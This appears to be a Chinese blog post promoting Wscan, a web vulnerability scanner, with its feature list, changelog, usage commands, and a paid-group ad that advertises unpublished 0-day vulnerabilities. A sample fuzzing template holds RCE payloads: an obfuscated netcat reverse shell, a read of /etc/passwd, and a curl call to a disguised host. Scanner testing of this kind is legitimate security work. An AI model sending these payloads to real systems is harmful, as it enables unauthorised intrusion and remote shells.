0x01 工具介绍
Wscan是一款专注于WEB安全的扫描器,它向Nmap致敬,而Nmap已经开源25年了。我们也计划在未来25年内持续更新Wscan,并将其持续开源。我们欢迎所有对web安全感兴趣的人一起加入我们的开发团队。我们的目标是开发一款使用机器学习进行渗透测试的工具。与其他工具不同的是,我们的工具可以自动学习攻击和防御的模式,并根据具体的目标进行个性化的攻击。这样一来,我们的攻击效率和准确性将大大提高,同时也能降低误判的概率。我们的工具采用了机器学习技术,实现了全自动化的Web渗透测试。这意味着无需手动添加和更新规则和签名,它能够自动学习和适应新的攻击模式和漏洞。机器学习技术还能够快速处理大量的数据和流量,从而大幅提高测试效率和准确性。此外,它能够识别和发现一些人工难以察觉的漏洞和弱点,从而改善测试质量和可靠性。我们相信,使用机器学习技术进行渗透测试,将是未来网络安全的一个重要方向。我们希望我们的工具能够帮助更多的人保障网络安全,为网络安全事业做出贡献。
下载地址在末尾
0x02 功能简介
架构简析
开源时间表
Wscan的目标是创建一个开源且非盈利的项目。然而,由于Wscan的工作量庞大,代码仍在快速迭代中。过早地进行开源可能导致各种各样的魔改版本涌现,这对工具的传播和项目未来的发展并不利。因此,计划以Stars作为考量指标,分阶段分模块进行开源,以确保项目的稳健性和社区的有序参与。
YAML POC扫描模块 (Stars > 400 开源)反连模块 (Stars > 400 开源)对内置的Payload不满意,自定义WAF绕过WEB通用漏洞检测模板 (特色功能)(Stars > 400 开源)SQL注入模块 (Stars > 500 开源)动态爬虫 (Stars > 600 开源)目录扫描模块 (Stars > 700 开源)基线扫描 (Stars > 800 开源)基于消息订阅的插件调度模块 (Stars > 900 开源)HTTP参数形变模块, 传统扫描模块全部开源, 可自行修改编译构建扫描器 (Stars > 1k 开源)机器学习降低误报模块 (Stars > 3k 开源)机器学习自动生成Paylaod模块 (Stars > 4k 开源)
0x03更新介绍
2023.11.05 发布v1.0.0 二进制版,支持简单的Web通用漏洞检测2023.11.12 发布v1.0.1 二进制版,静态爬虫2023.11.12 发布v1.0.2 二进制版,支持被动扫描2023.11.19 发布v1.0.3 二进制版,支持JSONP插件2023.11.26 发布v1.0.4 二进制版,修复XSS、SQL注入漏报的问题,支持对单个URL进行漏洞检测2023.11.30 发布v1.0.5 二进制版,支持浏览器爬虫、支持URL、表单智能过滤2023.12.02 发布v1.0.6 二进制版,支持输出JSON、HTML格式的扫描结果2023.12.03 发布v1.0.7 二进制版,支持Yaml POC扫描插件2023.12.04 发布v1.0.8 二进制版,支持通过命令行指定要启用的plugins2023.12.09 发布v1.0.9 二进制版,支持自定义WEB通用漏洞扫描模板(Waf绕过/Waf测试)2023.12.12 发布v1.0.10 二进制版,目录扫描内置400条常见规则、支持自定义扫描路径爆破。支持ASP、PHP通用命令执行检测2023.12.24 发布v1.0.11 二进制版,支持独立部署反连模块,同时Yaml POC支持反连功能2023.12.30 发布v1.0.12 二进制版,支持Goby JSON POC插件,多层URL目录POC扫描2024.01.07 发布v1.0.13 二进制版,支持XXE、SSRF、Fastjson、 Struts2系列漏洞批量检测
0x04 使用介绍
(1) 主动扫描./wscan --log-level=debug ws --basic-crawler http://testphp.vulnweb.com/ --json-output=wscan_scan_result.json --html-output=wscan_scan_result.html./wscan --log-level=debug ws --browser http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html./wscan --log-level=debug ws --url http://testphp.vulnweb.com/listproducts.php?cat=1 --json-output=wscan_scan_result.json./wscan --log-level=debug ws --url-file=/wscan/url_file.txt --html-output=wscan_scan_result.html./wscan --log-level=debug ws --poc=/your_wscan_poc/wscan-poc/pocs/* --url http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html(2) 被动扫描./wscan --log-level=debug ws --listen=127.0.0.1:1000 --json-output=wscan_scan_result.json(3) POC扫描3.1 POC下载地址 https://github.com/chushuai/wscan-poc/releases3.2 Wscan首次运行时,将会生成一个名为config.yaml的文件。您需要修改该文件中的以下内容,以指定include_poc的路径。prometheus:enabled: truedepth: 1auto_load_poc: falseinclude_poc:- C:wscan_windows_amd64.exewscan-poc-1.0.0pocs*.ymlexclude_poc: []3.3 通过命令行启用--plug=prometheus,并且指定--url-file(一行一个url)绝对路径,即可进行大范围POC检测./wscan --log-level=debug ws --plug=prometheus --url-file=/url_file.txt --html-output=wscan_scan_result.html(4) 自定义WEB通用漏洞扫描模板(Waf绕过/Waf测试)4.1 不同于POC测试,自定义WEB通用漏洞扫描插件,会对指定位置的参数进行FUZZ,样例参考 https://github.com/chushuai/wscan/tree/main/core/plugins/custom_tmpl/tmpl/owasp插件样例---payload:- $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)- /etc/passwd- "`curl -L http://u24BCu24C4u24C4u24BCu24C1u24BA.u24B8u24C4u24C2`"encoder:- URLplaceholder:- URLParam- HTMLForm- HTMLMultipartForm- JSONRequesttype: "RCE"...4.2 您需要修改config.yaml文件中的以下内容,以指定include_tmpl的路径。enabled: truedepth: 0auto_load_tmpl: falseinclude_tmpl:- /wscan/core/plugins/custom_tmpl/tmpl/owasp/*.ymlexclude_tmpl: [ ]block_status_codes: # 被WAF阻止时HTTP状态码列表,默认值为403- 403pass_status_codes: # 未被WAF阻止时HTTP状态码列表, 默认值为200或404- 200- 404block_regex: "" # 被WAF阻止网页的正则表达式pass_regex: "" # 未被WAF阻止网页的正则表达式non_blocked_as_passed: false4.3 通过命令行启用--plug=custom_tmpl,即可对目标网站进行自定义Payload测试。./wscan --log-level=debug ws --plug=custom_tmpl --browser http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html(5) 独立部署反连模块./wscan reverse
生成报告模板
0x05 内部福利介绍
需要加入内部知识星球可点击下方链接,资源包含但不限于网上未公开的day漏洞,2024最新企业SRC/CNVD/Edu实战挖掘技巧报告,红队内网横向渗透,代码审计,JS逆向,SRC培训等课程。圈子对新人友好,加入圈子拥有FOFA、shadan、360Quake、ZoomEye、Tide等等高级会员账号,SRC文档,武器库。圈子里面资料价值至少在10K以上,目前星球内部主题300+,资源2000+,其他和网盘资源1w+并持续更新中,越早加入价格越低。(详情点击下方地址了解-->>还是觉得价格贵的师傅后台回复" 星球 "有优惠券使用名额有限先到先得)
免责声明
获取方法
公众号回复20240113获取下载地址
最后必看
文章中的案例或工具仅面向合法授权的企业安全建设行为,如您需要测试内容的可用性,请自行搭建靶机环境,勿用于非法行为。如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用。如您在使用本工具或阅读文章的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。本工具或文章或来源于网络,若有侵权请联系作者删除,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……




还没有评论,来说两句吧...